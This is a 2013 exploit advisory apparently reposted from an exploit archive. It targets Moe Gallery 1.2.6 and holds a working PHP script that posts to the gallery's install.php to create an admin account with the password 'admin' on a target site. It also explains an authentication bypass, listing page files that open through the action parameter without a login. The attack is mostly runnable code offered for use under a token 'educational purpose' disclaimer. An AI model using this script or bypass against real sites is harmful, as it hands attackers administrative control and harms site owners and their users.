facebook facebook twitter rss

Moe Gallery 1.2.6 Multiple Vulnerabilities

Author: Slotleet , Published: 17-05-2013
#!/usr/bin/php
# Exploit Title : Moe Gallery 1.2.6 Multiple Vulnerabilities
# Date : 5/17/2013
# Author: Slotleet
# Slotleet () GMAIL com
# https://fb.com/Slotleet
# Vendor Homepage: http://www.moagallery.net/
# Version affected : 1.2.6
# Tested on: WIN 7 Xd4rk EDITION
# Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , DamaneDz ,
Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris
:P
#
# this was written for educational purpose only. use it at your own risk.
# `AUTHOR` will be not responsible for any damage caused! user assumes
all responsibility
# intended for authorized web application pentesting only!
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Moe Gallery 1.2.6 Multiple Vulnerabilities
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ [Add Admin]

<?

error_reporting(0);


if ($argc < 3){
echo "+--------------------------------------+\n";
echo "+ Usage : $argv[0] localhost /moe/ +\n";
echo "+--------------------------------------+\n";
die();
}


$site = $argv[1];
$dir = $argv[2];

$ch = curl_init("http://$site/$dir/install.php?stage=stage3a");
curl_setopt ($ch, CURLOPT_POST, true);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$result = curl_exec($ch);

if ($result){

echo "+-------------------------------------===--+\n";
echo "+ Done ~ Username : Admin Password : Admin +\n";
echo "+--------------------------------===-------+\n";

}

?>

~ [Session Bypass]

1 // Redirect admin access for anyone not logged in
2 if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin')))
3 {
4 $action = 'login';
5 }
6
7 switch($action)
8 {
9 case "admin" :
10 {
11 include_once("sources/page_admin.php");
12 break;
13 }
14 case "admin_ftp" :
15 {
16 include_once("sources/page_admin_ftp.php");
17 break;
18 }

look to line 2 theres a function called Userisloggedin to check if the
admin logged in or not, but there's `ACTION` param that calls sources
folder with switch and case :).
let's see if there's a UserIsLoggedIn() in those files :).


// Only proceed if a user is logged in
if (!UserIsLoggedIn())
{
Aahhh There is ;), i check those files, and we can bypass it by
browsing (index.php?action=list here)

page_gallery_add.php
page_gallery_view.php
page_image_view.php
page_image_view_full.php
page_main_view.php
page_sitemap.php
page_slideshow.php
page_upgrade.php

we can browse it via (index.php?action=gallery_add) without (Page_) :)

./EOF

Like us on Facebook :